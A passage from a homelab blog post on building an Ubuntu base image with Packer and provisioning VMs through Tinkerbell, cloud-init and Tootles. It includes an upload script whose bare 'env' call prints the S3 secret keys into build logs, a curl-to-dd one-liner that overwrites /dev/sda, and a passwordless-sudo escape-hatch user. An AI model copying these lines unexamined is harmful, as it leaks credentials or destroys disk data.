<p>So I decided to stay with my Packer approach. One problem with my current approach
was that it reboots the image after installation and runs Ansible on it. And when
using cloud-init, that would count as the first boot, so the first boot after
actually installing the image would not run cloud-init again. But it should. So
I looked for a way to disable provisioning, and found it in <a href="https://github.com/hashicorp/packer/issues/1591">this issue</a>:
setting <code>communicator = &#34;none&#34;</code>, so Packer never connects to the VM and no provisioner runs.</p>
<p>My <a href="https://developer.hashicorp.com/packer">HashiCorp Packer</a> file looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">locals</span> {
</span></span><span style="display:flex;"><span>  ubuntu-major <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  ubuntu-minor <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2&#34;</span>
</span></span><span style="display:flex;"><span>  ubuntu-arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>  out_dir <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;img-name&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base-${local.ubuntu-major}.${local.ubuntu-minor}-${local.ubuntu-arch}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;s3-access&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/s3-creds&#34;, &#34;access&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;s3-secret&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/s3-creds&#34;, &#34;secret&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-base&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/${local.ubuntu-major}/ubuntu-${local.ubuntu-major}.${local.ubuntu-minor}-live-server-${local.ubuntu-arch}.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:d6dab0c3a657988501b4bd76f1297c053df710e06e0c3aece60dead24f270b4d&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  firmware          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/share/edk2-ovmf/OVMF_CODE.fd&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  communicator      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;none&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.img-name}&#34;</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-base-autoinstall&#34;</span>)
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [&#34;&lt;wait&gt;e&lt;wait5&gt;&#34;, &#34;&lt;down&gt;&lt;wait&gt;&lt;down&gt;&lt;wait&gt;&lt;down&gt;&lt;wait2&gt;&lt;end&gt;&lt;wait5&gt;&#34;, &#34;&lt;bs&gt;&lt;bs&gt;&lt;bs&gt;&lt;bs&gt;&lt;wait&gt;autoinstall ds<span style="color:#f92672">=</span>nocloud-net\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://</span>{{ .<span style="color:#66d9ef">HTTPIP</span> }}<span style="color:#960050;background-color:#1e0010">:</span>{{ .<span style="color:#66d9ef">HTTPPort</span> }}<span style="color:#960050;background-color:#1e0010">/</span> <span style="color:#960050;background-color:#1e0010">---&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&lt;</span><span style="color:#66d9ef">f10</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base-${local.ubuntu-major}.${local.ubuntu-minor}-${local.ubuntu-arch}&#34;</span>
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-base&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">post</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">processor</span> <span style="color:#e6db74">&#34;shell-local&#34;</span> {
</span></span><span style="display:flex;"><span>    script <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/scripts/s3-upload.sh&#34;</span>
</span></span><span style="display:flex;"><span>    environment_vars <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;OUT_DIR<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">abspath</span>(<span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">out_dir</span>)<span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;OUT_NAME<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">img-name</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_PROVIDER<span style="color:#f92672">=</span><span style="color:#66d9ef">Ceph</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_TYPE<span style="color:#f92672">=</span><span style="color:#66d9ef">s3</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_ACCESS_KEY_ID<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">s3-access</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_SECRET_ACCESS_KEY<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">s3-secret</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_ENDPOINT<span style="color:#f92672">=</span><span style="color:#66d9ef">https</span><span style="color:#960050;background-color:#1e0010">://</span><span style="color:#66d9ef">s3</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This Packer file starts out with downloading the current Ubuntu 24.04.2 Server LTS
install image. It then uses Packer&rsquo;s <a href="https://developer.hashicorp.com/packer/integrations/hashicorp/qemu/latest/components/builder/qemu">Qemu plugin</a>
to launch a VM on the machine where the Packer build is executed.
The way the automation works is always pretty funny to me. See the <code>boot_command</code>
parameter above. Packer just takes control of the keyboard and types in what
you&rsquo;d type in to run an Ubuntu autoinstall. The small HTTP server used to
supply the <code>user-data</code> is automatically started by Packer and made available to
the VM. This file uses Ubuntu&rsquo;s <a href="https://canonical-subiquity.readthedocs-hosted.com/en/latest/index.html">autoinstall</a>
to automate the installation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">autoinstall</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">identity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$6$exDY1mhS4KUYCE/2$zmn9ToZwTKLhCw.b4/b.ZRTIZM30JZ4QrOQ2aOXJ8yk96xpcCof0kxKwuX1kqLG/ygbJ1f8wxED22bTL4F46P0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">locale</span>: <span style="color:#ae81ff">en_US.UTF-8</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">source</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">id</span>: <span style="color:#ae81ff">ubuntu-server-minimal</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">layout</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">direct</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install-server</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">late-commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo &#39;ubuntu ALL=(ALL) NOPASSWD:ALL&#39; &gt; /target/etc/sudoers.d/sysuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">shutdown</span>: <span style="color:#ae81ff">poweroff</span>
</span></span></code></pre></div><p>Not much configuration is necessary here. I create the <code>ubuntu</code> user purely
as an escape hatch, so that if something goes wrong with later provisioning
steps, I still have a way to get into the machine. It&rsquo;s removed in the first
steps of my Homelab Ansible playbook.</p>
<p>As I&rsquo;ve noted above, I don&rsquo;t need any additional customization here; the plan
was to create a small, really generic image I could then customize once it
was installed on a machine.</p>
<p>The last interesting part is the post-processor in the Packer file. Here, I
wrote a little script that uploads the finished image to my S3 storage, so
Tinkerbell has a place to install it from. This is what the <code>s3-upload.sh</code>
script looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ! command -v rclone &gt; /dev/null; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Command rclone not found, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>image<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>OUT_DIR<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">${</span>OUT_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> ! -f <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Could not find image &#39;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;Copying </span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">...&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>env
</span></span><span style="display:flex;"><span>rclone copy <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> cephs3:public/images/ <span style="color:#f92672">||</span> exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>exit <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>It uses <a href="https://rclone.org/">rclone</a> to upload the image file to S3. One advantage
of starting out with a generic image is that it doesn&rsquo;t contain any secrets or
credentials, so there&rsquo;s no problem with putting it on an (internally) public S3
bucket.
The credentials for the S3 upload are fetched from Vault via Packer&rsquo;s Vault integration
into the <code>s3-access</code> and <code>s3-secret</code> variables at the beginning of the Packer file.</p>
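<p>If the upload ever misbehaves, the same environment-variable-based rclone remote can be
exercised by hand outside of Packer. This is just a sketch with placeholder credentials,
not part of the actual build:</p>
<pre tabindex="0"><code># Manual smoke test of the env-var based rclone remote (placeholder values)
export RCLONE_CONFIG_CEPHS3_TYPE=s3
export RCLONE_CONFIG_CEPHS3_PROVIDER=Ceph
export RCLONE_CONFIG_CEPHS3_ENDPOINT=https://s3.example.com
export RCLONE_CONFIG_CEPHS3_ACCESS_KEY_ID=...
export RCLONE_CONFIG_CEPHS3_SECRET_ACCESS_KEY=...

rclone lsd cephs3:public/                      # list directories in the bucket
rclone check ./output cephs3:public/images/    # compare local image against the upload
</code></pre>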
<h2 id="provisioning-the-vm-via-tinkerbell">Provisioning the VM via Tinkerbell</h2>
<p>And now finally, I was ready to fully provision a VM with Tinkerbell. This
requires an update of the Tinkerbell Template, which now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: test-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;install ubuntu&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/image2disk:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 900
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                IMG_URL: {{ .Values.images.ubuntuBaseAmd64 }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DEST_DISK: /dev/sda
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                COMPRESSED: false</span>
</span></span></code></pre></div><p>And that just worked, right out of the box. The Tinkerbell <code>image2disk</code> action
downloaded the image from S3 and automatically put it onto the VM&rsquo;s local disk.</p>
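<p>Conceptually, for an uncompressed raw image like mine, that boils down to streaming
the image straight onto the block device. A rough shell equivalent, purely as an
illustration of the idea (the URL is a placeholder, and this is not how the action is
actually implemented):</p>
<pre tabindex="0"><code># Conceptual equivalent of streaming an uncompressed raw image onto a disk
IMG_URL=https://s3.example.com/public/images/ubuntu-base.raw   # placeholder URL
DEST_DISK=/dev/sda
curl -fsSL "$IMG_URL" | dd of="$DEST_DISK" bs=4M conv=fsync
</code></pre>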
<p>And just like that, I had a fully deployed VM, provisioned via Tinkerbell. &#x1f389;</p>
<p>But not so fast. Of course, the first thing missing here was a proper cloud-init
config to set up my standard Ansible user so I could run my standard playbook.
<a href="https://cloud-init.io/">Cloud-init</a> can download configuration for the initial
boot from a cloud provider, codified in the <code>user-data</code> and <code>vendor-data</code>.
It runs in several phases during boot: first, before the network is available,
from local config files, and then, once networking is up, from <code>user-data</code> provided
e.g. by the cloud provider via an HTTP server. The <code>user-data</code> and <code>vendor-data</code> can
also be provided entirely from local files. There&rsquo;s a wide range of configuration
that can be done via cloud-init, from creating local users and installing packages
to configuring mounts and networking.</p>
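<p>A handy way to see which <code>user-data</code> a booted machine actually received is to ask
cloud-init itself. These commands should work on any cloud-init-enabled host, run as root:</p>
<pre tabindex="0"><code># Show the user-data cloud-init fetched for this instance
cloud-init query userdata
# The raw copy is also kept on disk
cat /var/lib/cloud/instance/user-data.txt
# Overall status of the cloud-init run
cloud-init status --long
</code></pre>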
<p>To supply this cloud-init data, Tinkerbell has the <a href="https://tinkerbell.org/docs/services/tootles/">Tootles</a>
component. It implements AWS&rsquo; EC2 metadata service API, which is also supported
by cloud-init. The metadata reported by Tootles for any given instance is
supplied via the Hardware object:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">id</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:5a:91:8c</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ips</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.20</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_pxe</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operating_system</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">distro</span>: <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">x86_64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:5a:91:8c</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ip</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.20</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">netmask</span>: <span style="color:#ae81ff">255.255.255.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">10.86.25.254</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">userData</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    packages:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - openssh-server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - python3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - sudo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ssh_pwauth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    disable_root: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    allow_public_ssh_keys: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    timezone: &#34;Europe/Berlin&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    users:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: ansible-user
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shell: /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ssh_authorized_keys:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - from=&#34;192.0.2.100&#34; ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt user@foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        sudo: ALL=(ALL:ALL) ALL
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    runcmd:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl enable ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl start ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    power_state:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      delay: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      mode: reboot</span>
</span></span></code></pre></div><p>The first change necessary here is to add the <code>spec.interfaces[].dhcp.ip</code> section.
This is one of the suboptimal pieces of Tinkerbell. I&rsquo;m not actually having
Tinkerbell do the IPAM part of DHCP; that&rsquo;s still left to my OPNsense router.
But I still needed to specify the VM&rsquo;s IP here, because the EC2 API, and thus
Tootles, determines which metadata to return by the IP the request is coming
from. So if you just request <code>/2009-04-04/meta-data</code> from any random host,
you won&rsquo;t get a response. The request needs to come from an IP that has a
matching Hardware object. Another downside is that the <code>spec.metadata</code> section needs to
be defined manually - it&rsquo;s not automatically derived from the rest of the Hardware
object.</p>
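<p>That also makes for a quick way to check whether Tootles knows about a machine: run the
request from the machine in question against the metadata endpoint. Assuming Tootles is
reachable at the URL that shows up in the cloud-init datasource config further below,
that would look like this:</p>
<pre tabindex="0"><code># Only returns data when run from an IP that has a matching Hardware object
curl -s http://203.0.113.200:7172/2009-04-04/meta-data/
curl -s http://203.0.113.200:7172/2009-04-04/user-data
</code></pre>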
<p>Then we come to the actually interesting part, the <code>spec.userData</code>. This is the
cloud-init config returned to the machine upon request. As I&rsquo;ve noted above,
the main goal here is to configure the new machine so I can run my main Ansible
playbook on it. I&rsquo;m making sure that my Ansible user exists, has my SSH key
and is in the sudoers file. In addition, I&rsquo;m making sure that SSH is started,
and then the machine is finally rebooted. The <code>#cloud-config</code> comment is load-bearing,
by the way; without it, cloud-init won&rsquo;t accept the configuration.</p>
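<p>Since a typo in this YAML only shows up on the next full provisioning cycle, it&rsquo;s
worth validating the config before putting it into the Hardware object. Recent
cloud-init versions ship a schema checker for exactly this (on older versions the
subcommand lives under <code>cloud-init devel schema</code>); <code>user-data.yaml</code> here is just a
local copy of the config:</p>
<pre tabindex="0"><code># Validate a #cloud-config document against cloud-init's schema
cloud-init schema --config-file user-data.yaml
</code></pre>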
<p>So far so good, but this configuration still did not work. The central issue was
that the machine did not have a proper networking config. The <code>ip addr</code> command
showed the Ethernet interface as down. This confused me, because the
cloud-init docs clearly state that, when there&rsquo;s no explicit network config
given, a default using DHCP on all interfaces will be applied.</p>
<p>So I went searching. And that wasn&rsquo;t easy, because it turns out that Ubuntu&rsquo;s
server-minimal install is so minimal that it even eschews vi or nano. I had to
look at files with <code>cat</code>. But I was finally able to find what I was looking for.
In <code>/etc/netplan/50-cloud-init.yaml</code>, I found this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">network</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ethernets</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ens3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcp4</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>That file was created by the installer during the Packer install run. But of
course, the NIC had a different name in that environment than it has on the
final VM.
To remedy this, I added another task to the Tinkerbell Template, overwriting the
cloud-init network config created by the installer so that the defaults apply:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;remove installer network config&#34;</span>
